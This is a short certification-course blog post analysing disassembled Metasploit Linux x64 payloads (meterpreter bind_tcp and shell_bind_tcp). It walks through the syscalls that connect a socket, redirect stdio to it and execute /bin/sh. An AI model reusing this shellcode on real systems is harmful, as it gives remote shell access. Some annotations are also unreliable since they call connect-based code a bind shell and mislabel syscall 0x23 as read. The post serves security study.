SLAE64 #5 - MSF shellcode analysis

I would be analysing chunks of the linux/x64/meterpreter/bind_tcp and the linux/x64/shell_bind_tcp and see how they differ. Although both are TCP bind shellcode, the primary difference among them is that the meterpreter shellcode is a staged payload while the other is a stageless payload. As such, the meterpreter shellcode expects the server to provide a second stage while the other will immediately return a usable shell.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
linux/x64/meterpreter/bind_tcp payload

0x400078        xor    %rdi,%rdi
0x40007b        pushq  $0x9
0x40007d        pop    %rax
0x40007e        cltd
0x40007f        mov    $0x10,%dh
0x400081        mov    %rdx,%rsi
0x400084        xor    %r9,%r9
0x400087        pushq  $0x22
0x400089        pop    %r10
0x40008b        mov    $0x7,%dl
0x40008d        syscall   

Register values: rax - 0x9, rsi - 0x1000, r10 - 0x22, rdx - 0x1007
sys_mmap call to allocate memory for the second stage payload


0x40008f        test   %rax,%rax
0x400092        js     0x4000ef
0x400094        pushq  $0xa
0x400096        pop    %r9
0x400098        push   %rsi
0x400099        push   %rax
0x40009a        pushq  $0x29
0x40009c        pop    %rax
0x40009d        cltd
0x40009e        pushq  $0x2
0x4000a0        pop    %rdi
0x4000a1        pushq  $0x1
0x4000a3        pop    %rsi
0x4000a4        syscall

Register values: rax - 0x29, rcx - 0x40008f, rsi - 0x1, r10 - 0x22, rdi - 0x2, r9 - 0xa, r11 - 0x346   
sys_socket call to create a socket to bind to


0x4000a6        test   %rax,%rax 
0x4000a9        js     0x4000ef
0x4000ab        xchg   %rax,%rdi
0x4000ad        movabs $0x100007fbb010002,%rcx
0x4000b7        push   %rcx
0x4000b8        mov    %rsp,%rsi
0x4000bb        pushq  $0x10
0x4000bd        pop    %rdx
0x4000be        pushq  $0x2a
0x4000c0        pop    %rax
0x4000c1        syscall

Register values: rax - 0x2a, r10 - 0x22, rdx - 0x10, rdi - 0x3, r11 - 0x306   
sys_connect call to bind to 127.0.0.1:443
0x100007f - 127.0.0.1
0xbb01 - 443


0x4000c3        test   %rax,%rax
0x4000c6        jns    0x4000e3
0x4000c8        dec    %r9
0x4000cb        je     0x4000ef
0x4000cd        pushq  $0x23
0x4000cf        pop    %rax
0x4000d0        pushq  $0x0
0x4000d2        pushq  $0x5
0x4000d4        mov    %rsp,%rdi
0x4000d7        xor    %rsi,%rsi
0x4000da        syscall

Register values: rax - 0x0, rcx - 0x100007fbb010002, r10 - 0x22, rdx - 0x1000, r9 - 0x9, r11 - 0x306
sys_read to read second stage payload and write to allocated memory address at rcx.

I was not able to proceed further without the correct payload, however I believe the next step would be to jump to second stage 
payload for execution.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
linux/x64/shell_bind_tcp payload

0x400078        pushq  $0x29
0x40007a        pop    %rax
0x40007b        cltd
0x40007c        pushq  $0x2
0x40007e        pop    %rdi
0x40007f        pushq  $0x1
0x400081        pop    %rsi
0x400082        syscall

Register values: rax - 0x29, rsi - 0x1
sys_socket call to create a socket to bind to


0x400084        xchg   %rax,%rdi
0x400086        movabs $0x100007fbb010002,%rcx
0x400090        push   %rcx
0x400091        mov    %rsp,%rsi
0x400094        pushq  $0x10
0x400096        pop    %rdx
0x400097        pushq  $0x2a
0x400099        pop    %rax
0x40009a        syscall

Register values: rax - 0x2a, rcx - 0x100007fbb010002, rdx - 0x10, rdi - 0x3, r11 - 0x302 
sys_connect call to bind to 127.0.0.1:443
0x100007f - 127.0.0.1
0xbb01 - 443   


0x40009c        pushq  $0x3
0x40009e        pop    %rsi
0x40009f        dec    %rsi
0x4000a2        pushq  $0x21
0x4000a4        pop    %rax
0x4000a5        syscall
0x4000a7        jne    0x40009f

Register values: rax - 0x21, rsi - 0x3 , 1 , 0, rdx - 0x10, rdi - 0x3, r11 - 0x302   
sys_dup2 to redirect STDOUT, STDIN, STDERR to socket. JNE will jump 3 times, till rsi = 0x0


0x4000a9        pushq  $0x3b
0x4000ab        pop    %rax
0x4000ac        cltd
0x4000ad        movabs $0x68732f6e69622f,%rbx
0x4000b7        push   %rbx
0x4000b8        mov    %rsp,%rdi
0x4000bb        push   %rdx
0x4000bc        push   %rdi
0x4000bd        mov    %rsp,%rsi
0x4000c0        syscall

Register values: rax - 0x3b , rbx - 0x68732f6e69622f

sys_execve call to /bin/sh
0x68732f6e69622f - /bin/sh

This blog post has (not) been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE64-XXXXX



Tags: Security

Similar Articles

SLAE64 #1 - Bindshell TCP shellcode - There are many SLAE64 blogposts each explaining their variant of shellcode out there. I thought I would join in the fun. This is my version of the Bindshell TCP shellcode. I'll keep it brief and ...
SLAE64 #3 - Egghunter shellcode - As usual, I will only be touching on interesting or unique points in the shellcode. Line 25/26: To avoid having the egg in memory, I moved 0x5090508f into a register and incremented it to get ...
SLAE64 #5 - MSF shellcode analysis - I would be analysing chunks of the linux/x64/meterpreter/bind_tcp and the linux/x64/shell_bind_tcp and see how they differ. Although both are TCP bind shellcode, the primary difference among them ...
SLAE64 #2 - Revshell TCP shellcode - This shellcode is very similar to the Bindshell TCP shellcode, so please refer to it for the unique and interesting points. There is only 1 additional point I would like to make: Line 8/37: ...